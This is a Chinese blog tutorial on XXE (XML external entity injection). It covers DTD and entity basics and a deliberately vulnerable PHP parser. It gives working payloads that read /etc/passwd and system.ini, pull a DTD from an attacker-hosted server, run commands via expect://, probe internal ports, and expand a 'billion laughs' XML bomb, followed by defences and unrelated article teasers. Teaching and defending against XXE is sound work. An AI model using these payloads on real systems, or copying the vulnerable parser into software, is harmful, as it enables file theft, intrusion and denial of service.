news 2026/7/4 10:11:36

XML外部实体注入漏洞——XXE简单分析

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
XML外部实体注入漏洞——XXE简单分析

前言:
XXE漏洞经常出现在CTF中,一直也没有系统的学习过,今天就来总结一波。

一、XXE 漏洞是什么:

XXE 漏洞全称:XML External Entity Injection,即 XML 外部实体 注入漏洞。XXE 漏洞发生在应用程序解析 XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起 Dos攻击等危害。

二、XML基础知识:

想要了解 XXE漏洞,需要先了解一下关于 XML的基础知识。

1、XML是什么?

  • XML全称:可扩展标记语言(Extensible Markup Language)。

  • XML是独立于软件和硬件的信息传输工具,它把数据从HTML中分离。 XML语言没有预定义的标签,需要作者定义自己的标签和自己的文档结构。

  • XML 被设计用来传输和存储数据,HTML 被设计用来显示数据。

2、XML文档结构:

XML文档结构包括:

  1. XML声明

  2. DTD 文档类型定义(可选)

  3. 文档元素。

示例代码:

其中 DTD (Document Type Definition)即文档类型定义部分 定义了XML文档的标签以及元素属性。

如上图中的DTD 就定义了XML的根元素为 note,然后根元素下面有一些子元素 (to,from,heading,body),那么下面的文档元素就可以使用这些元素:

<!--文档元素--><note><to>Dave</to><from>Tom</from><head>Reminder</head><body>You are a good man</body></note>

注:

  • PCDATA:可被解析的字符数据。PCDATA 数据类型是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理,而实体会被展开。与之对应的是CDATA

  • CDATA:不被解析的字符数据,CDATA 数据类型是不会被解析器解析的文本,在这些文本中的标签不会被当作标记来对 待,其中的实体也不会被展开。详细可点这 链接

DTD声明方式:

其中DTD有两种构建方式,分别为内部 DTD声明和外部 DTD声明。

1、内部DTD声明:

声明格式:

<!DOCTYPE根元素[元素声明]>

如 上例使用就是内部 DTD声明。

2、外部DTD声明:

通过引入 dtd文件的方式进行声明(这一点和 css,javascript 很像)。

声明格式:

<!DOCTYPE根元素SYSTEM"文件名">

例:

<?xml version="1.0"?><!DOCTYPEnoteSYSTEM"test.dtd"><note><to>H</to><from>E</from><head>L</head><body>LO</body></note>

test.dtd:

<!ELEMENTto(#PCDATA)><!--定义to元素为”#PCDATA”类型--><!ELEMENTfrom(#PCDATA)><!--定义from元素为”#PCDATA”类型--><!ELEMENThead(#PCDATA)><!--定义head元素为”#PCDATA”类型--><!ELEMENTbody(#PCDATA)><!--定义body元素为”#PCDATA”类型-->

🆗,说完了 DTD的两种引入方式,终于到了关键人物:" 实体 " 登场了。

实体的声明:

实体定义在 DTD声明中,

例:

<?xml version="1.0"?><!DOCTYPEsss[<!ELEMENTsssANY><!ENTITYxxe"hello">]>

这里定义元素为 ANY 表示可以接受任何元素作为标签,这里的"xxe"就是我们所说的实体了(相当于一个变量),可以在XML文档元素中使用&符号对实体进行引用。

例:

<sss><user>&xxe;</user><pass>pass</pass></sss>

到时候输出的时候&xxe;就会被hello替换。

实体的分类:
1、按声明位置分(和上面的内外部引入DTD声明不同,别弄混了):

实体是定义在 DTD 中的,可分为外部实体内部实体,上面的例子就是内部实体,外部实体就是把实体定义在外部文件中。

例:

<?xml version="1.0"?><!DOCTYPEsss[<!ELEMENTsssANY><!ENTITY xxe SYSTEM "file:///D:/test.dtd" > //引入外部dtd文件]><sss><user>&xxe;</user><pass>pass</pass></sss>

这样当需要更改实体的值时,只需要更改外部的 dtd 文件就行,不需要打开源码更改了(降低了耦合性),但也带来了安全漏洞。

外部实体支持http、file等协议。不同程序支持的协议不同:

2、按类型分:

实体又分为通用实体和参数实体。

1、通用实体

  • &实体名;引用,在DTD 中定义(内外DTD都行),在 XML文档元素中引用。

上面的例子都是通用实体。

2、参数实体

  • 使用% 实体名(中间有空格) 在DTD中定义(内外DTD都行),并且只能在DTD中使用%实体名;引用。

  • 在 DTD 文件中,参数实体的声明可以引用其他实体(参数实体和通用实体)。

引入格式:

内部引入

<!ENTITY%实体名称"实体的值">

例:

<?xmlversion="1.0"encoding="utf-8"><!DOCTYPEAuthor[<!ENTITY%first"Hello"><!ENTITY%second"%first;_World">%second;]>

%second;会解析为:Hello_World

外部引入

<!ENTITY%实体名称SYSTEM"URI">

例:

<!DOCTYPEa[<!ENTITY % name SYSTEM "file:///D:/test.dtd"> %name;]>

三、如何利用XXE:

说了这么多,终于来到了重点,正如标题 XXE名为 “外部实体注入”,也就是说时是通过引入外部实体的方式进行注入的。

我们先来看这个例子:

<?xml version="1.0"?><!DOCTYPEs[<!ELEMENTsANY><!ENTITY xxe SYSTEM "file:///D:/test.dtd" >]><s><user>&xxe;</user><pass>pass</pass></s>

既然能读 dtd文件,那是不是将路径换成敏感文件的路径,也能把敏感文件读出来?

例:

解析 xml 的php文件:

test.php:

<?phplibxml_disable_entity_loader(false);$xmlfile=file_get_contents('php://input');$dom=newDOMDocument();$dom->loadXML($xmlfile,LIBXML_NOENT|LIBXML_DTDLOAD);$creds=simplexml_import_dom($dom);echo$creds;?>

构造payload:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPEA[<!ENTITY a SYSTEM "file:///c:/windows/system.ini">]><A>&a;</A>

可以看到,成功读取到了 C盘下的system.ini文件,此漏洞就是任意文件读取漏洞

四、XXE漏洞常见的危害:

1、任意文件读取:

构造任意文件读取漏洞 playload 有下面几种方法:

方式一、直接通过外部实体声明

XML内容:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPEa[<!ENTITY b SYSTEM "file:///etc/passwd">]><a>&b;</a>

上面的例子就是此方式,这是最简单的XXE漏洞利用。

方式二、外部实体声明 (通用实体)+ 外部 DTD文件

XML内容:

<?xml version="1.0"?><!DOCTYPEaSYSTEM"http://XXX/test.dtd"><c>&b;</c>

注意:这里的 http://XXX/test.dtd 是攻击者自己服务器上的文件。

test.dtd 内容:

<!ENTITYbSYSTEM"file:///etc/passwd">

示例(使用的是 xxe-labs 靶场的php环境):

因为这里使用windows演示的,所以读取的是system.ini文件,可以看到成功的读取到了。

方式三、外部实体声明(参数实体) + 引入外部实体声明

因为参数实体可以嵌套别的实体,所以产生了这种方式。

<?xml version="1.0"?><!DOCTYPEa[<!ENTITY % d SYSTEM "http://XXX/test.dtd"> %d;]><c>&b;</c>

test.dtd 内容:

<!ENTITYbSYSTEM"file:///etc/passwd">

示例:
注意这种方式必须要先引用 参数实体,才能引用通用实体,且缺一不可。

2、命令执行:

在安装 expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令。
因为PHP的 expect 并不是默认安装扩展,所以命令执行比较难利用,但不排除有幸运的情况。

<?xml version="1.0" encoding="utf-8"?><!DOCTYPExxe[<!ELEMENTnameANY><!ENTITY xxe SYSTEM "expect://cat /" >]><root><name>&xxe;</name></root>

3、内网探测:

XML 外部实体中是可以使用http://协议,可以利用该请求去探查内网。

<?xml version="1.0" encoding="utf-8"?><!DOCTYPExxe[<!ELEMENTnameANY><!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]><root><name>&xxe;</name></root>

4、攻击内网网站:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPExxe[<!ELEMENTnameANY><!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]><root><name>&xxe;</name></root>

5、发起Dos攻击:

几乎所有可以控制服务器资源利用的东西,都可用于制造DOS攻击。通过XML外部实体注入,攻击者可以发送任意的HTTP请求,因为解析器会解析文档中的所有实体,所以如果实体声明层层嵌套的话,在一定数量上可以对服务器器造成DoS。

常见的XML炸弹:

<?xml version="1.0"?><!DOCTYPElolz[<!ENTITYlol"lol"><!ENTITYlol2"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITYlol3"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITYlol4"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITYlol5"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITYlol6"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITYlol7"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITYlol8"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITYlol9"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>

攻击原理:XML解析器尝试解析该文件时,DTD中的实体会以指数级的数量级展开,lol 实体为 “lol” 字符串,然后一个 lol2 实体引用了 10 次 lol 实体,一个 lol3 实体引用了 10 次 lol2 实体,此时一个 lol3 实体就含有10^2个 “lol” 了,以此类推,lol9 实体含有10^8个 “lol” 字符串,所以这个1K不到的文件经过解析后会占用到3G的内存,可见有多恐怖,不过现代的服务器软硬件大多已经抵御了此类攻击。

防御XML炸弹的方法也很简单禁止DTD或者是限制每个实体的最大长度。

五、XXE 如何防御:

方式一、使用开发语言提供的禁用外部实体的方法:

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactorydbf=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python:

fromlxmlimportetree xmlData=etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
方式二、过滤用户输入:

过滤用户提交的XML数据 ,关键词:<!DOCTYPE>、<!ENTITY>、SYSTEM、PUBLIC

最后

🆗,关于 XXE漏洞的总结大致就这些了,后面遇到新的 XXE利用方式再补上。( •̀ ω •́ )✧

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/4 10:10:23

LTC6903数字控制振荡器与TM4C129微控制器的精准频率系统设计

1. 项目概述&#xff1a;数字控制振荡器的核心价值 在嵌入式系统和射频设计中&#xff0c;精准可控的频率源一直是关键组件。传统方案通常采用晶体振荡器或压控振荡器(VCO)&#xff0c;前者缺乏灵活性&#xff0c;后者则面临线性度和稳定性问题。LTC6903这款数字控制振荡器(DCO…

作者头像 李华
网站建设 2026/7/4 10:10:00

Android静态代码扫描效率优化:增量扫描与缓存机制实战

1. 项目概述&#xff1a;为什么我们需要持续优化静态扫描效率&#xff1f; 做Android开发的朋友&#xff0c;尤其是负责过中大型项目或团队的同学&#xff0c;对“静态代码扫描”这个词一定不陌生。它就像是代码的“体检中心”&#xff0c;在你提交代码、打包发布前&#xff0c…

作者头像 李华
网站建设 2026/7/4 10:09:54

生产机器学习:从模型上线到系统化运维的实战指南

1. 为什么“模型上线”才是ML项目真正的起点&#xff0c;而不是终点&#xff1f;你有没有经历过这样的场景&#xff1a;凌晨两点&#xff0c;手机突然震动&#xff0c;钉钉弹出一条红色告警——“信用评分服务P99延迟突破800ms&#xff0c;超阈值300%”。你抓起电脑冲进工位&am…

作者头像 李华
网站建设 2026/7/4 10:05:04

电力负荷预测:算法选型与工程实践指南

1. 电力负荷预测的核心价值与挑战 电力系统短期负荷预测是电网调度、电力交易和发电计划制定的基础性工作。作为一名在电力行业摸爬滚打十年的工程师&#xff0c;我深刻体会到精准预测对电网安全经济运行的决定性作用。简单来说&#xff0c;它就像电力系统的"天气预报&quo…

作者头像 李华
网站建设 2026/7/4 10:04:23

AI数据中心建设热潮及其对GDP增长的驱动作用

1. AI投资热潮与数据中心基建狂潮 2025年第一季度&#xff0c;美国私营部门固定投资同比增长7.1%&#xff0c;其中信息技术相关资本支出创下36%的惊人增速。这个数字意味着什么&#xff1f;相当于每分钟就有超过50万美元投入AI基础设施&#xff0c;主要流向数据中心建设、GPU服…

作者头像 李华
网站建设 2026/7/4 10:03:54

机器学习核心概念与实战指南

1. 机器学习核心概念解析 在人工智能领域&#xff0c;机器学习已经成为了最核心的技术支柱之一。作为一名从业多年的AI工程师&#xff0c;我经常被问到"如何快速掌握机器学习的基础知识"。今天我就来系统梳理一下这个领域的核心术语和概念&#xff0c;这些都是我在实…

作者头像 李华